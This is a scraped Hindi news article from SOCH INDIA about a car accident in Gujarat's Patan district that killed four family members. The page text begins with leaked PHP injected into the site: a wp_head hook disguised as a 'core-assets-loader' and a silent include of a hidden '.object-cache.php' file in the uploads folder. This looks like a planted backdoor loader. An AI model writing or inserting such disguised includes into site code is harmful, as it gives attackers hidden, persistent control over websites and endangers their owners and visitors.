add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Gujarat Car Accident: गुजरात में बड़ा हादसा, पानी से भरे गड्ढे में गिरी कार, दंपति और उनकी बेटी समेत चार लोगों की मौत – SOCH INDIA
Menu

देश
Gujarat Car Accident: गुजरात में बड़ा हादसा, पानी से भरे गड्ढे में गिरी कार, दंपति और उनकी बेटी समेत चार लोगों की मौत

nobanner

गुजरात के पाटन जिले में एक कार सड़क पार कर रहे एक जंगली सूअर से टकराने के बाद पानी से भरे गड्ढे में गिर गई, जिससे गाड़ी में सवार दंपति और उनकी नाबालिग बेटी तथा भतीजी डूब गई. पुलिस ने बुधवार को यह जानकारी दी. पुलिस उपाधीक्षक हरदेवसिंह वाघेला ने बताया कि यह दुर्घटना पाटन के संतालपुर तालुका में फंगली गांव के पास सुबह करीब साढ़े छह बजे हुई. उन्होंने बताया कि मृतक भी इसी गांव के रहने वाले थे.

शादी समारोह में शामिल होने जा रहे थे
उन्होंने बताया कि परिवार कच्छ जिले में एक शादी समारोह में शामिल होने जा रहा था, लेकिन उनकी कार अचानक एक जंगली सूअर से टकरा गई. इसके बाद कार का संतुलन बिगड़ गया और वह सड़क किनारे पानी से भरे एक गड्ढे में गिर गई.

मृतकों की हुई पहचान
संतालपुर थाने के एक अधिकारी ने बताया कि मृतकों की पहचान महेन्द्र जोशी (41), उनकी पत्नी भावनाबेन (37), उनकी बेटी दिशा (13) और महेन्द्र की भतीजी उर्वशी (15) के रूप में हुई है. उन्होंने बताया, ”दुर्घटना उस वक्त हुई जब पीड़ित अपने पैतृक गांव से कच्छ के लिए रवाना हुए थे.” अधिकारी ने बताया कि कुछ स्थानीय लोगों ने घटना की जानकारी पुलिस को दी. उन्होंने बताया कि शवों को बाहर निकालकर पोस्टमार्टम के लिए संतालपुर के एक सामुदायिक स्वास्थ्य केंद्र में भिजवाया गया है.